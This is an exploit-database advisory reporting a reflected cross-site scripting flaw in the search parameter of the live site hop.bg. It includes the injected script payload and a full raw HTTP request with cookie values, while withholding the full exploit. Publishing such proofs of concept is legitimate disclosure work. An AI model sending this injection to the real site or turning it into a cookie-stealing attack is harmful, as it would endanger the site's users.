Share
## https://sploitus.com/exploit?id=PACKETSTORM:211132
## Titles: hop.bg | web app | Cross-site scripting (reflected)
    ## Author: nu11secur1ty
    ## Date: 11/03/2025
    ## Vendor: https://hop.bg/
    ## Software: https://hop.bg/
    ## Reference: https://portswigger.net/web-security/cross-site-scripting
    
    ## Description:
    The value of the `srch` request parameter is copied into a JavaScript
    string which is encapsulated in single quotation marks. The payload
    lifmu</script><script>alert(1)</script>nkt8b was submitted in the `srch`
    parameter. This input was echoed unmodified in the application's response.
    
    This proof-of-concept attack demonstrates that it is possible to inject
    arbitrary JavaScript into the application's response.
    
    STATUS: HIGH- Vulnerability
    
    [+]Payload:
    ```
    GET
    /bg/tyrsene-123?p=123&l=1&srch=gq7ns%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3ein737&submit_search=
    HTTP/1.1
    Host: hop.bg
    Cache-Control: max-age=0
    Sec-CH-UA: "Chromium";v="141", "Not;A=Brand";v="24", "Google Chrome";v="141"
    Sec-CH-UA-Mobile: ?0
    Sec-CH-UA-Platform: "Windows"
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Cookie: Public=3l4neblt0r1q8tl8r1j8vm1kg2; l=1;
    _gcl_au=1.1.1810943222.1761893757;
    _fbp=fb.1.1761893757009.110679894202803572; _tt_enable_cookie=1;
    _ttp=01K8WGTCHG0MT2MTV43EPDVPSH_.tt.1;
    _uetsid=a6fe2700b62611f0ba2e15757049e30e;
    _uetvid=a6fe6880b62611f0a84c27f8eba50d96;
    ttcsid=1761893757500::mkwLVMcL6Tixw1dD6Twz.1.1761893767648.0;
    ttcsid_D0S5A7RC77U1EAH3MNBG=1761893757499::8I3zM_RSsJeOcW0e8fgM.1.1761893767648.0
    Upgrade-Insecure-Requests: 1
    Referer: https://hop.bg/
    ```
    
    [+]Exploit:
    ```
    Not showing for security reasons
    ```
    
    ## Reproduce:
    [href]("Not showing for security reasons")
    
    
    ## Demo PoC:
    [href](Not showing for security reasons)
    
    ## Time spent:
    01:27:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/ and
    https://www.asc3t1c-nu11secur1ty.com/
    nu11secur1ty <https://nu11secur1ty.blogspot.com/>